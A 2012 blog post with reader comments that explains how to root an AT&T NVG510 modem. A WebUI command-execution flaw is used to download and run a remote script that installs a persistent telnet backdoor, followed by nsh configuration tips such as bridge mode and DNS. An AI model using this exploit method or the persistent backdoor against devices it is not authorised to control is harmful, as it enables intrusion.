Rooting The NVG510 from the WebUI

One-click Android Application

The fix to common problems with the NVG510 and NVG589 is now available as a push-button $3 Android app called NVG510 Fixer. You can see more information at this blog post. If you don't think it's worth it though, (or want to do crazy technical things), just stick with the free instructions on this page

 

 

Updated for new firmware! :)

This guide has been tested to work with the following hardware and firmware:

  • NVG510 9.0.6h2d30
  • NVG510 9.0.6h2d21
  • NVG510 9.0.6h048
  • NVG589 (unknown)

It's very possible that other Netopia OS based modems are affected as well. There is a Netopia modem used in Switzerland that probably can be rooted with this.

How to root the modem

Warning

WARNING: This is information on how to root your modem. Rooting is to take full control, like rooting your Android phone. It can possibly brick your modem if not used responsibly. USE AT YOUR OWN RISK

Enabling a telnet backdoor and reaching root shell

  1. View the modem's update page, which should be at http://192.168.1.254/cgi-bin/update.ha
  2. Login if you haven't already.
  3. Now you'll want to view the HTML source of the page.
  4. Search for the term "nonce" in the HTML source. You should see something like this:

    input type="hidden" name="nonce" value="815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02"

  5. Hang on to that piece of text and now load my control2 page page.

  6. Take the "value" of the nonce and put it into the text field labeled nonce on the page. 815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02 would be what you put into it for this example.
  7. Load the page up and push Save.
  8. At this point, you might see different things, depending on your browser. You might get a message that the page couldn't be displayed, or you might see some text. If you see the text, make sure that it says "backdoor telnet enabled" or some such. You might also just see the normal Web Update interface with a "invalid firmware image" message. This is nothing to worry about either.
  9. Now, you will need to reboot your modem. You can do this by doing to http://192.168.1.254/cgi-bin/restarting.ha
  10. Now you should be able to login to the modem with telnet on port 28. The username is admin and the password is your modem's "access code" that should be written on it.
  11. Finally, you should see the shell.

To clarify, your telnet session should look like this:

[earlz@EarlzZeta ~]$ telnet 192.168.1.254 28
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.

login: admin
Password:

Terminal shell v1.0
Copyright (C) 2011 Motorola, Inc.  All rights reserved.
Motorola Netopia Model NVG510 Wireless-N ADSL AnnexA Ethernet Switch
Running Netopia SOC OS version 9.0.6 (build h2d30)
ADSL capable
(admin completed login: Admin account with read/write access.)

NOS/XXX> 

From here, you can do a few different things. This shell is called nsh. If you want to get to a root shell, just type !. At that point, you can do exit to get back to nsh. Also, if you prefer the shell described in the FCC manual (and used by AT&T techs), you can type cshell after getting to the root shell.

How does it work?

I've found a vulnerability in the WebUI of the NVG510 (and other modems) that allows me to execute any command as root. You can utilize this by sending it a specially crafted HTTP request.

So, I use this to download the shell script at http://earlz.net/static/backdoor.nvg510.sh and execute it on the modem. What the shell script does is it will install a new service into inetd so that it starts a telnet shell, and I configure it using pfs to be persistent. Otherwise, it would go away after rebooting.

Uninstalling the backdoor

The backdoor installed should be fairly safe, being password protected, but if you're especially worried, then it can easily be uninstalled. Just telnet into the modem, get to the root shell by using !, and then type:

pfs -r /var/etc/inetd.d/telnet28

Note! This backdoor will not be uninstalled with a factory reset or firmware update!. Once you've installed it, it's there until you uninstall it! Again, there should be no risk in leaving it there, it will not be internet accessible. But, it's easy to uninstall as well.

Solving common problems

To confirm you're at nsh, you should see a prompt like this:

Axis/1234565678> 

The nsh Console

This console is fairly simple and easy to use, and breaks out everything that you can configure on the modem. But, it is not the console described in the FCC manual.

This is the help text for the console, to help you understand:

Axis/124578433> help
help [command]                 : Get help.
history                        : Show command history.
get OBJ.ITEM                   : Get the value of OBJ.ITEM (ITEM is a
                                 parameter or status). ### Hint: run 'info
                                 OBJ.params' or 'info OBJ.status' to get a
                                 list of the OBJ's parameters and status.
set OBJ.ITEM VALUE             : Set the value of OBJ.ITEM to VALUE.
info INFO [ARGS ...]           : Get the INFO information (expert mode).
new OBJ [NAME]                 : Create an object with an (optional) name
                                 (requires an 'apply')
del OBJ                        : Delete an object (requires an 'apply')
aget OBJ.ITEM ATTR             : Get the OBJ.ITEM's ATTR attribute.
aset OBJ.ITEM ATTR VALUE       : Set the OBJ.ITEM's ATTR attribute to VALUE.
name OBJ [NAME]                : Get or set the OBJ's "name" (specify a new
                                 name to set it).
names [OBJ]                    : Recursively show all object names.
validate [OBJ]                 : Validate OBJ, or the entire database if no
                                 OBJ specified.
apply                          : Apply changes to the database (changes are
                                 NOT saved).
revert                         : Revert the database by discarding your
                                 changes.
save                           : Save the database (rewrites config.xml).
defaults                       : Reset the system back to the factory
                                 defaults (deletes config.xml).
dump [OBJ [LEVELS]]            : Dumps the OBJ's parameters, or the entire
                                 database. Use the optional LEVELS parameter
                                 to limit the depth of the database tree.
sdump [OBJ [LEVELS]]           : Dumps the OBJ's status, or the entire
                                 database.
tdump [TEMPLATE [LEVELS]]      : Dumps the template, or the entire SDB schema.
dirty [OBJ]                    : Displays which parameters are dirty.
run CMD [ARGS ...]             : Run the SDB's CMD command (expert mode
                                 only!).
event EVT [ARGS ...]           : Send the EVT (event number) to the SDB
                                 (expert mode only!).
console [on | off]             : Direct all log messages to this console.
                                 Without arguments, toggles on and off.
log [OPTIONS]                  : View log messages. See "log help" for more
                                 information.
voiplog [OPTIONS]              : View log messages. See "log help" for more
                                 information.
mfg [OPTIONS]                  : Set or view MFG parameters. See "mfg help"
                                 for more information.
mirror [PORT CAPTURE-PORT] | "off" : Mirror Ethernet traffic on PORT so that it
                                 may seen on CAPTURE-PORT. Specify "off" to
                                 turn mirroring off.
resetstats [OBJ] ["all"]       : Reset any statistics the object may have.
                                 The optional "all" argument will recursively
                                 reset all children's stats as well. If only
                                 "all" is given (OBJ is omitted), this will
                                 reset all statistics starting at the root
                                 node.
metadata OBJ.PARAM             : Returns metadata information about a given
                                 parameter.
fwinstall URL | "last"         : Install a firmware image. Use "last" to
                                 reuse the last URL.
crashdump ["erase"]            : Shows the most recent crash dump contents.
                                 The optional "erase" will erase both current
                                 and last saved crash dump contents.
reboot [N] | ["cancel"]        : Reboot the router in N seconds (default is
                                 2). "cancel" argument can be issued to
                                 cancel a previous reboot command.
source FILE                    : Read and process commands from FILE.
. FILE                         : An alias for 'source'.
exit                           : Exit from this shell.
quit                           : An alias for 'exit'.
magic                          : Enter magic mode.
crash                          : Read and Write the Memory mapped registers

Seems simple enough then doesn't it?

Example Configuration

So, let's say you want to enable SSH. The relevant configuration option for this is mgmt.shell.ssh-port. So, to set this, we type this in:

set mgmt.shell.ssh-port 22

This will set the SSH port to 22, rather than disabled. And then, if you're done configuring, you can save and apply the changes by typing these commands in:

validate
apply
save

You don't necessarily have to do validate, but I assume it's safer to use it I think. I believe that this is what happens:

  1. validate will validate the changes to make sure that no data was input in a way that wouldn't make sense (like if nameserver was set to 921.123.45.673)
  2. apply will actually cause the modem to notice the changes and begin executing using those changes you've made
  3. save will cause the changes you made to persist after reboot. I assume it saves it to flash with this command.

That's really about all there is to know. Configuration is super simple.

Configuration

As you can tell from the dump log, there are a ton of configuration options. Here I'll give you a hint to the more useful ones, as well as some configuration stuff to be aware of

DNS problem fix

This is provided for historical reasons, but it's WRONG. This will not fix the DNS problems or let you point it at a different DNS server. I don't know why it doesn't work, but I've received multiple reports that it doesn't. Your best bet in this case is to use the true bridge mode and get your own router

ip.dns.domain-name             = att.net
ip.dns.primary-address         = 99.99.99.53
ip.dns.secondary-address       = 99.99.99.153
ip.dns.proxy-enable            = on
ip.dns.override-allowed        = off

You should be able to change these to something more appropriate. override-allowed should be turned on(otherwise I believe they will be reset by DHCP over the DSL link).

Enabling Telnet and/or SSH

mgmt.shell.ssh-port            = 0
mgmt.shell.telnet-port         = 0

These you should change to what port you want it to run on. Note though that I've yet to figure out the username and password used for SSH. I've searched through both the dump and through the GPL source code and can't find any hints really.

So, to enable these you can just do something like

set mgmt.shell.ssh-port 22
set mgmt.shell.telnet-port 23
validate
apply
save

If you want to enable remote access to telnet and/or ssh (I highly recommend not opening up telnet to the world) you can modify these values to something appropriate:

mgmt.remoteaccess[3].protocol  = telnet
mgmt.remoteaccess[3].port      = 0    XX change this to 23
mgmt.remoteaccess[3].idle-timeout = 5
mgmt.remoteaccess[3].total-timeout = 20
mgmt.remoteaccess[3].max-clients = 4
mgmt.remoteaccess[4].protocol  = ssh
mgmt.remoteaccess[4].port      = 0     XX change this to 22
mgmt.remoteaccess[4].idle-timeout = 5
mgmt.remoteaccess[4].total-timeout = 20
mgmt.remoteaccess[4].max-clients = 4

Enabling UPnP

I haven't confirmed this, but I believe UPnP can be enabled by changing this to on:

mgmt.upnp.enable               = off

Disable "Potential Connection Issue" warnings

mgmt.lan-redirect.enable       = on

Change it to off. lan-redirect is what causes that extremely annoying redirecting to happen when the connection is lost or "has possible problems". What the modem will do is when you request a nameserver, it will, instead of sending back no route, timeout, or the actual name servers response, it will instead make every domain forward to 192.168.1.254, so that you can then load an HTML page that causes a redirect(but doesn't set it to do-not-cache) to /cgi-bin/home.ha... So basically, you click do not show, yet the page continues to try to redirect due to modern web browser caching and the lack of a no-cache directive on the redirect page.

Disabling the DHCP server

conn[1].dhcps-enable           = on

Note that you'll have to configure a static IP to the modem to access it after this. I don't see much of a point in disabling it completely.

True Bridge Mode

A very often wanted feature of the NVG510 is for it to just get out of your way and let your (hopefully more sane) router to deal with all the firewall and NAT business. After quite a bit of experimenting and starting over with default and a bit of an accident, I believe I've figured it out.

Some of the values in the NVG510's configuration "database" appears to be magical, and lots of assumptions have to be made without real technical documentation. So, let's look at the link object that appears to be linked to WAN and LAN connections in an assumed manner.

Here is what was in my modem's dump about links. Your's should look similar:

link[1].type                   = ethernet
link[1].igmp-snooping          = off
link[1].mtu-override           = 0
link[1].port-vlan.ports        = lan-1 lan-2 lan-3 lan-4 ssid-1 ssid-2 ssid-3 ssid-4
link[1].port-vlan.priority     = 0
link[2].type                   = ethernet
link[2].mtu-override           = 0
link[2].supplicant.type        = eap-tls
link[2].supplicant.qos-marker  = AF1
link[2].supplicant.priority    = 0
link[2].port-vlan.ports        = vc-1
link[2].port-vlan.priority     = 0
link[2].tagged-vlan[1].ports   = ptm
link[2].tagged-vlan[1].vid     = 0
link[2].tagged-vlan[1].priority = 0

ptm is the PPP connection. So we basically want for the PPP connection to be routed straight to an ethernet port so our router can handle it. So here is what I did

set link[1].port-vlan.ports "lan-2 lan-3 lan-4"
set link[2].port-vlan.ports lan-1

The first command sets the LAN link so that only the LAN ports 2-4 is used. The next link sets the link for the WAN side of the link. Previously, the port is vc-1. I assume vc-1 is hardwired to magically go to the LAN somehow. Anyway, replacing vc-1 with lan-1 basically makes the equivalent of a PPP bridge.

On the router side, all you have to do is use that port and the modem will do all of the PPP authentication, and I assume MRU shifting to 1500.. All your modem will get is a raw stream from AT&T's servers. So if you send it a DHCP client request, you'll get a response straight from AT&T's servers.

This is the only configuration required as well. This will short through all of the modem's crappy configuration and directly forward it to the first ethernet port(the one closest to the barrel jack power adapter).

And if for some odd reason you need to access the actual modem(such as for reconfiguration), just plug your network cable into another port. The built-in DHCP server runs just as before, except it will never be connected to the internet.

Note: I've had reports that this doesn't completely work when your account is provisioned with multiple static IP addresses. If you have problems and are willing to lend me some time to test things with you, email me at earlz -AT- earlz dot net

Possible Problem: If your modem seems to "hang" when doing apply with the bridge mode configuration and you can't use the save command, then that means you tried to do it from port-1. Change which port on the NVG510 your computer is plugged into(or use Wifi if you're extra brave)

Other Dangerous Things

From this bootloader, you can change a lot of things AT&T probably would frown upon. Basically, you can make it look like another modem. I'm not for sure about this though and will have to test it and research it more. I don't recommend changing anything in the mfg section. If you do one of these kind of hacks, be prepared for AT&T to notice and ban you from U-Verse, your modem to become bricked, or for your dog to randomly die. Don't go too far into the dangerous looking unknown.

Conclusion

The NVG510 is really a decent modem, but has been kiddie-proofed so hard that it hurts. I hope this guide helps you to taking full control of your modem. Also, I don't recommend trying to evade your U-Verse accounts capabilities. I imagine AT&T won't care much if they catch you modifying your modem... they will care if you modified it to reach 16Mbit speeds when you only have a 3Mbit account though, and I'm sure they keep tabs on it. Don't be stupid.

Same goes for trying to boost wifi power or use channels not specified for use in your country. The FCC is real! (btw, don't tell them about my FM transmitter project ;) )

Configuration Template You can dump this for yourself, but to see what Motorola's "template" is for it's configuration options you can check out this pastebin. If you don't know what options a configuration object supports, this is a good bit to look at. Though a few things in the template don't exist in my NVG510 at least and will cause crashes if objects are created. (cifs will not work for me)

Older Versions

This is a new hack that should work on old firmware. However, if you're interested in the old hack(that only works on old firmware), you can see the wayback machine for a historical copy.

Posted: 6/7/2012 12:26:03 AM

Comments

Anonymous
I'm glad you are digging into this modem and found this! I'd looked through the config stuff but missed the redirect disable option.

From the contents of /www/residential, it looks like either the software was designed for of devices, or this device is capable of supporting USB devices and DLNA.

I added info to wikidevi about grabbing data from the device, such as /www/*.
6/8/2012 3:19:12 PM
Earlz
Hey, sorry about the bad formatting of your comment. I guess that's a comment bug I missed in testing.

Anyway, I saw residential, but tried and it didn't like it much. It broke out quite a few more options, but
is still missing some basics like DNS nameserver changing. 

Also, thanks for updating that wiki. I wasn't for sure if this information really belonged there or not.
I did not even think of using that method to get files off of the modem! I instead opted to use the tftp client on the modem. 

Hopefully we can get more people taking control of this modem and posting their own tricks. 
One of the odd things I thought about it was that it supports having 4 different wireless networks.

Also, I believe the modem has USB support on the processor, but not all of the support hardware for it, as I don't see any pinout for it.  
6/9/2012 6:21:06 AM
Anonymous
I wanted to say Thanks You for studying this device and sharing your findings.

Because of you I was able to disable that god awful redirect page.  It's a shame AT&T has this modem so jacked up and worse they don't seem to care.

Anyway,  Thanks again.
7/5/2012 3:16:43 AM
Earlz
@Anonymous Well, that stupid redirect page bugged me non-stop. It'd appear out of the blue sometimes without even a power failure. One time it did it, kicked me off XBox Live for no reason and I decided the fight was on. I have 2 modems anyway, might as well open one up. So, I opened it, got to the serial port.. and eventually ended up looking at the source code for the Web Interface and found a vulnerability. I had quite a few friends that had the same modem and same problems, so I documented it hoping to help everyone with this crappy modem. AT&T doesn't seem likely to ever patch their horrible firmware and don't care at all about how poorly it's designed.. Hopefully this trend continues because this exploit would be really easy to patch, and I believe it's the only one that exists 
7/5/2012 7:12:54 AM
Anonymous
How can I get the router to stop overriding my changes to the dns server?
Tired of having to go in again and again to change my nameserver back to google/opendns
I already tried the ip.dns.override-allowed option and that didn't stop it.
7/10/2012 8:54:03 PM
Earlz
@Anonymous. About the DNS problems. I know about this, but I don't see any easy solutions so far. 
7/11/2012 7:00:37 AM
Newbie
I followed the foregoing instructions and was able to get to the root via "magic" then "!".  I can both Telnet & SSH into the root.  I'm totally new to Linux and have been researching UNIX/Linux commands on Google.  However, I can not seem to figure out how to edit /etc/dnsmasq.conf or /var/etc/dnsmasq.conf.  Under either directory, whenever I enter vi /etc/dnsmasq.conf or vi /var/etc/dnsmasq.conf both Telnet & SSH return "/bin/sh: vi: not found".

I've also tried the commands edit; ed; ex w/the same results, e.g. "/bin/sh: ex: not found".

Any ideas on what I'm missing or doing wrong?
10/7/2012 2:44:16 PM
Earlz
@Newbie Hi! The included unix utilities for the NVG510 is a bit.. sparse. I believe the only way to edit files on the device is to use `cat` and output redirection. However, if you value your sanity, you won't do that :P 

What I did to edit files is setup a TFTP server on my network and then use the included TFTP client on the modem to upload and download files. This is probably the easiest option. I've gotten a tip from elsewhere about some people compiling a less-restricted Busybox for the modem and then uploading it via TFTP. 
10/7/2012 5:41:49 PM
Anonymous
Thanks for this great help! I changed the dns servers but they are randomly being changed back. I assume is because I have dynamic IP or any time router is rebooted. I tried "override", but didn't work. I also set "dns proxy-enable" to off. But when I did this, I could no longer use the internet. Any help on how to get NVG510 to "hold" on to the DNS servers I input for good without changing back to att? Can I change DNS from DHCP?
11/18/2012 9:26:55 AM
Earlz
@Anonymous I don't know. There have been numerous reports from others about this problem but no one has seemed to find a solution yet. I don't use this modem anymore (switched to Cable), so I don't update any of this anymore. If anyone can figure it out though, I'll definitely publish a link to it. 
11/18/2012 8:35:26 PM
geeknik
I have static IPs, will putting them into 'bridge' mode cause any problems here?
12/14/2012 12:40:40 AM
Anonymous
Protip from someone who's dealt with similar bullshit from a Verizon-provided router: the DNS configuration and other settings may be being remotely enforced by a backdoor web configuration interface, or possibly just the remote management interface over the DSL line. In the Verizon configuration, the reason for opening a backdoor to router management was, as far as I could tell, for Verizon support requests from people who don't know what a router is and because certain services required opening ports to communicate with some of the cable TV services behind the coax part of the network, and they wanted to force auto configuration (look up MoCA if you're interested). Of course it's a gaping security hole (I could access it from anywhere on the Internet).
Point is, if you're lucky and it turns out DNS enforcement cannot be done over the DSL management interface, you may be able to stop the DNS behavior by disabling that remote management feature / port in the firmware (or adding firewall rules to prevent it f
12/14/2012 1:58:19 AM
Earlz
@Geeknik you shouldn't have any problems. You'll just have to make sure that your router properly handles the static IPs. You may have to manually set the IP(s) of your router in order to get it to work. I'm not for sure if AT&T directly passes down a static IP from their DHCP servers

@Anonymous I don't believe it's DNS enforcement. There is a management port open on the modem(to the public), but I can't get at the password. Tried brute forcing it, but didn't get anywhere. Also, by doing the true-bridge mode, this management port gets closed. With true bridge mode the modem literally does not think it's even connected to the internet. I don't believe updates or anything will be received in bridge mode. 
12/14/2012 3:28:45 AM
MG
Hi, I really liked your articles even if I don't own that kind of router. I've always wondered, how did you manage to get to the exploit? My guess is that you opened the source of a web page that allows you to edit some useless setting, via the standard UI or by downloading the page using the serial port stuff, then see how the post was made and then replicate the request mechanism with a different option name (like "mgmt.shell.telnet-port") and different value.
Am I correct? Am I missing something?
Thanks, and great job anyway.
12/14/2012 9:07:14 AM
Earlz
@MG that's exactly what I did. This particular exploit could've been found though without having the source code to the web application, but without access to the `nsh` shell and list of template configuration options, I wouldn't have been able to know what to change the form value to in order to enable telnet. 
12/14/2012 3:17:11 PM
Occam
Will this work with the 3800HGV-B?
12/16/2012 9:19:27 PM
Earlz
@Occam, highly doubtful. If I ever get U-Verse again, I can try my best to root it though. (Moved to Ohio and they told me I can't use the two NVG510 modems I already have of course. ugh, but apparently the modem up here is the 3800HGV) 

However, I've heard that the 3800HGV modem is much more sane than the NVG510, including being able to collect interesting things like precise line statistics and charts. 
12/17/2012 8:07:39 AM
Anonymous
Can confirm that the uPnP option does indeed enable uPnP.
12/18/2012 3:32:06 PM
Earlz
@Anonymous it does enable UPnP at least partially. The only thing I use UPnP for is so multiple XBoxs can have an open NAT type and this did the trick with 2 Xboxs... however, I set this up for one of my friends who has anywhere from 3-6 setup at a time and only 1 ended up with an open NAT type. Not sure if that's a limitation of xbox live, only having a single IP, or if this modem doesn't have a good UPnP implementation
12/18/2012 5:30:27 PM
Technobabe
Wow, Earlz, this is awesome! So nice to be able to CONTROL this bloody thing! I am having a strange problem with the NVG510, and I was wondering if you can point he in a useful direction to fix it. I have an NVG510 with a 3-bit subnet and a Linux server with an Intel eepro100 network card wired into the NVG510. When I fire up the NVG510 and plug nothing into it, the ping responses are at about 50ms. As soon as I plug my Linux server into it, the ping response time bounces all over the place - anywhere from 50ms to 600ms, although mostly in the 150-200ms range! The SMARMY AT&T tech told me that I have a "network configuration issue" and AT&T doesn't work on that. So, I went thru EVERY networking setting on both the server and the NVG510 at least 3 times, and I can see nothing that would cause this. Any ideas? Since I had AT&T replace the NVG510 and got the 50%+ packet failure down to consistently under 5%, the thru put is good, but why not get every bit of speed I can get? Thanks for any insight you can provid
12/18/2012 7:58:05 PM
Earlz
@Technobabe: I have no idea. First off, I'd make sure that it's really the NVG510. Plug a different computer to it and see if you have the same problem. If so, then see if wireless has the same latency issue. Beyond that, as a last resort you might want to try my true bridge mode to use your own router. This gets the NVG510 completely out of the way and lets your router do what it was made for.. routing. 
12/18/2012 9:23:01 PM
Anonymous
Regarding the modem in Ohio:

I am in Columbus and just recently (this month, December) started using Uverse, and they sent an NVG510.  So apparently it's more complicated than just statewide Ohio=3800HGV.

Anyway, I don't know how this can even be legal, the pure shittiness of the NVG510.  Isn't this why we have consumer regulatory agencies and stuff?  Hey, I have an idea how to make lots of money, I'll offer people high-speed internet with a one-year contract, but instead of actually providing them internet or anything like that I'll just send them a brick and tell them it's a modem!
12/26/2012 6:28:14 PM
Earlz
@Anonymous: It is indeed more complicated than just statewide. Apparently the NVG510 is used where there is 
U-Verse internet and phone, but not TV. (and using VDSL, not fiber to the home/node)

Also, you should watch out for patents with that technique. I think AT&T thought of it first! 
12/27/2012 3:28:06 PM
Anonymous
Is there anyway I can change my ip address with the root access? 
12/30/2012 12:31:09 AM
Earlz
@Anonymous: I assume you mean your public IP address. And probably not. If AT&T is even mildly competent, their servers won't allow this. However, changing manufacturer tied values and such may induce something like this. I'll warn you that this is one of those things AT&T will notice though and that probably voids your service agreement
12/30/2012 6:46:18 AM
Anonymous
@Earlz 
Well, lets say I buy another nvg510 and register it with my service will that change my pubic ip 
address given that the mac address is different?
12/30/2012 10:08:49 AM
Anonymous
Do I have to do a reset on NVG510 before turn it to True Bridge Mode? Currently, I am using IP-Passthrough Mode.
1/3/2013 10:41:35 PM
Tony
Cant seem to follow the true bridge guide. Modem locks up after doing "apply" after entering the two set commands.
1/6/2013 12:32:37 AM
Earlz
@Tony hmm that's odd. Have you tried doing a factory reset and then following the bridge mode instructions? 
1/6/2013 5:17:24 AM
Anonymous
I tried your instructions for the bridge mode and while it works, for some reason, the Broadband Status page of the NVG510 still showed the device as getting a valid public IP address and from the shell I could actually ping out to the public internet.
1/11/2013 8:50:09 AM
AnonymousW
Earl,

Thank you soooo much.  I could not get my Slingbox with the NVG510 until I read your article and enabled
UPnP.  Now it works great.
1/19/2013 1:20:54 AM
Pepper
Thanks for doing this. I think just putting the thing in bridge mode is going to solve my issues. I am now able, from the outside world, to pull up a web page hosted on my test machine behind the nvg510, just got to figure out why rdp and ping are not working yet.
1/30/2013 8:23:23 AM
Toao
Thought I should note, that for those having trouble with bridge mode after hitting apply, make sure you are configuring the modem via port 2,3,4 and NOT doing it on port 1, as when you hit apply port 1 will drop the telnet connection and begin the bridge to ATT. YOU MUST do the configuration while on lan port 2,3, or 4 so that you can SAVE or your configuration will NOT be persistent (it will reset every time the router turns off and you will lose bridge mode). I did this bridge mode last night and when I rebooted my Cisco router I lost all configuration and my router was DHCP'd a private net IP instead of the precious REAL internet IP I had earned.... lol
1/31/2013 6:17:16 PM
Earlz
@Toao, very good point! I hadn't thought about that. I'll add a note to the article
2/1/2013 2:47:31 AM
Sean
Once the TrueBridgeMode has been able, what connection type would then be chosen in my Asus router? PPPoE or normal DHCP?
2/8/2013 11:30:10 PM
Earlz
@Sean normal DHCP. It's definitely NOT PPPoE. If you need a username and password for it, you chose the wrong one. 
2/9/2013 3:06:25 AM
Anonymous
When I press "Save" on the complete_control page, I get redirected to my router configuration page, but it says:

"Address must not be on network (10.x.x.x)"

=/
2/16/2013 2:27:37 AM
Earlz
@Anonymous oooohhh... That sounds scary :( I have no way of verifying, but it sounds like the remote vulnerability might not exist in your firmware version(ie, it was patched). Email me at earlz @ this domain name(earlz.net) and I'll try to work out what's happening. 
2/16/2013 3:53:24 AM
Brother
My brother figured out the DNS changes.  He changed the proxy setting to "Off", Then he set an IP for the primary and Secondary setting, then applied, saved, then rebooted.  And it worked. The override was already set to "On". "iponfig /all" now show Open DNS name servers.
2/17/2013 3:25:50 AM
Brother
"ipconfig /all" now shows Open DNS name servers.
2/17/2013 3:28:12 AM
The Brother
To add to the previous Brother post.  Go to http://www.opendns.com/support/article/64 to test
the settings and the tests were all successful.  
I believe the DNS proxy setting (ip.dns.proxy-enable = on is the default) allows the device ie., router to allow name requests to be forwarded to the
ATT name servers. Turning that off and and setting open DNS servers allows the hosts on the network to recieve
those IP addresses via DHCP.  Well see what happens after a couple days to see if the settings hold.
Note:  The ip.dns override-allowed setting was 'ON' as the default.  I did not change that in the articel above
it shows it as off.  Not sure why but, it works for me with it ON.

Didn't know it could be easy... when you know a few secrets. Saved me running out and getting another router!

A BIG thanks to EARLZ for pointing us all in the right direction.  Would never have done it without your help.
2/17/2013 4:03:08 AM
The Brother
Update.  Device was turned off overnight and the DNS settings reverted to the factory at&t dns setting.
Anyone know how to make it permanent?  Re-entered using the configure command in normal shell and it seemed
to behave the same.  The settings would stay there during a reboot, but if it was turned off, the settings would
go back to 0.0.0.0 for primary and secondary
2/17/2013 11:03:57 PM
Earlz
As I noted at the beginning of the article, this is an open problem. It would appear that AT&T has hardcoded the DNS settings to be permanently non-configurable. I've heard of some hack with changing the DNS server's configuration file, but I don't imagine this being easy
2/18/2013 4:37:35 AM
Anonymous
This doesn't seem to work for me, but I also have my NVG510 assigned as 192.168.0.1 - is that messing up the control page?
2/20/2013 5:34:14 AM
Earlz
@Anonymous did your modem come shipped that way? Like if you do a factory reset does it reset it to 192.168.1.254?
2/20/2013 10:12:51 PM
Dngrsone
If I put my NVG510 into true bridge mode (to use with a Smoothwall Express firewall), would I be able to use the NVG510's wifi from behind the firewall (like, route the Protected LAN into lan2)? 
2/21/2013 2:31:57 AM
Anonymous
No, it didn't come set that way, I assume it would revert back to 192.168.1.254.  I changed it because that's how my previous network was setup when I switched ISPs, and it made it easier to change over.  I could change it back to the default if that's necessary, but then I will have to change the config of the router that sits behind it.  I'll do that if I have to, just checking to see if that is the issue before making the changes.
2/21/2013 4:04:35 AM
Earlz
@dngrsone In theory it could work, but I haven't been successful in getting it to. Once you put it in bridge mode, the wireless is basically useless. However, you could MAYBE disable the DHCP server and then have a setup like `modem bridged-out -> router in -> router out -> modem non-bridged port` and I THINK that would work. No guarantees though. Worst case is it'll reset everything to defaults when it crashes
2/21/2013 6:43:09 AM
Dngrsone
Hahaha... optimistic pessimism.  I love it.

Whelp, if I try, I will report back, either way it goes.  Be a shame to waste a decent wifi if it doesn't work out that way.

@Anonymous-- I have mine set to a different IP, and the hack doesn't work for me.  I think the page Earlz set up assumes the default IP when it sends the command to the modem.  You might try resetting the modem to default settings and then hit it with the hack.  
2/22/2013 12:14:04 AM
Anonymous
Yep, that did it.  Actually I just changed the IP of the modem (and the DHCP IPs), and the IP on my inside router.  Rooted the modem, changed the IPs back, and all is well.  Thanks much.
2/22/2013 3:21:21 AM
Tim S
HUGE thanks to Earlz for his hack and to Brother for the DNS-specific fix. I've had the DNS failure to resolve issue for over a year and it drove me bananas daily. I read the instructions and I was able to change the primary and secondary DNS of the NVG510 modem. I don't know if the settings will stick after a reboot or power cycle, but I do that maybe once every 3 months so it's no big deal. Anyway here's the exact command line syntax for other newbies like me:

login: admin
password: <number on your modem>
magic
!
nsh
You will need to login once more at the NSH prompt

Axis ############>
set ip.dns.proxy-enable off
set ip.dns.override-allowed on
set ip.dns.primary-address 208.67.222.220
set ip.dns.secondary-address 208.67.220.222
validate
apply
save

Open up a CMD prompt in Windows and type in "ipconfig /all"
You should now see that the primary and secondary DNS numbers have been changed to the OpenDNS servers.
Thanks again. You guys rock. I can't wait to try some of the other more obs
2/25/2013 7:22:26 AM
dick
Of interest to you, Earlz?
We are pleased to announce the Open Source redistribution for the NVG510 DSL CPE gateway product.
http://sourceforge.net/motorola-home/nvg510/news/2012/01/nvg510-open-source-redistribution/
http://sourceforge.net/projects/nvg510.motorola-home/files/README-NVG510.txt/download
http://sourceforge.net/projects/nvg510.motorola-home/files/
http://sourceforge.net/motorola-home/wiki/Projects/
3/1/2013 10:25:05 PM
dick
Motorola is pleased to provide the open source software used in the NVG510 device!

Please note that this project is for distributing, discussing, and supporting the open source software we release. This site does not provide any SDKs nor general purpose developer support for the NVG510.
http://sourceforge.net/motorola-home/nvg510/home/Home/
3/1/2013 10:27:00 PM
dick
wikidev?
http://www.wikidevi.com/wiki/Motorola_NVG510
3/1/2013 10:29:41 PM
Earlz
Interesting! This is much more source code than they gave out when I first took a look at their source code archives. Last I checked, they only had the "OSS" download available. They appear to leave out some crucial parts such as DSL and VoIP support.. but with what they've given, I'd expect a usable image for routing could be made. Only real problem is there is no documentation on how to reflash the modem other than that it uses CFE somehow
3/2/2013 3:47:20 AM
Anonymous
Great work.  Thanks!  I was able to log into the ssh server using "admin" and the device access code as the password.  I am running 9.0.6h2d21.  Since AT&T won't allow you to disable the DHCP server from the UI, I did it using the command line.  The DHCP server was giving me problems.  Even though we had it set to only give out 1 IP address, the other boxes using another DHCP server on the network would mysteriously end up with att.net as a domain search suffix and the router as the DNS server.  Hopefully this will solve the problem.
3/6/2013 11:20:47 PM
Anonymous
If I go through with logging in > magic > ! > nsh i cant do anything.   However, if I just type magic it is already at the nsh prompt, and I have configured upnp and google's dns servers to be working working after reboots and everything. There is no apply command though, but after validate and save it seems to apply.
3/9/2013 7:59:33 PM
Modified10Real newbie
@Earlz or who can help. Thanks you all for the information here!
help with #nine and any other useful information for a real newbie would be greatly
appreciated.
  
quote 9.Now you should be able to login to the modem with telnet.
 The username is admin and the password is your modem's "access code" 
that should be written on it.

I cant figure out how to access telnet on mac i go to teminal-new connection
 choose remote login (telnet)then i add http://192.168.1.254/cgi-bin/etherlan.ha
 to server-side box says server is found & i click connect and get back a message
that says this:

 http://192.168.1.254/cgi-bin/etherlan.ha: nodename nor servname provided,
 or not known
[Process completed]
i cant get passed this part thanks for any help.

ATT always for the shareholders not the customers
and there new plans for expansion are undiscribable.
3/10/2013 6:32:45 AM
Modified10Real newbie
figured it out lol 
3/11/2013 1:07:29 AM
DT
Thanks for the info, Earlz!
I am having a problem where I can put the router in true bridge mode, but it reverts back to non-bridged mode after a few days. Telnet still works, I just have to redo the commands. Have you or anyone else noticed this? Is there any fix? I am doing both save and apply.
3/15/2013 9:39:43 AM
DT
Nevermind I figured it out. My router was on port 4 instead of 1, doh! What ends up happening that if you put your router on another port after putting it in true bridge mode, it detects the router and overwrites your changes. I've turned off the DHCP server in the modem to prevent this in the future, should I inadvertently use the wrong port again.
3/18/2013 2:49:05 AM
mattkilla
so just to clarify turning on telnet does what? and true bridge mode would be beneficial to whom? im trying to tweak my modem to allow a higher access speed to each individual device. I never get close to what i pay for. was just wondering if someone could explain these few things in lay-mans terms
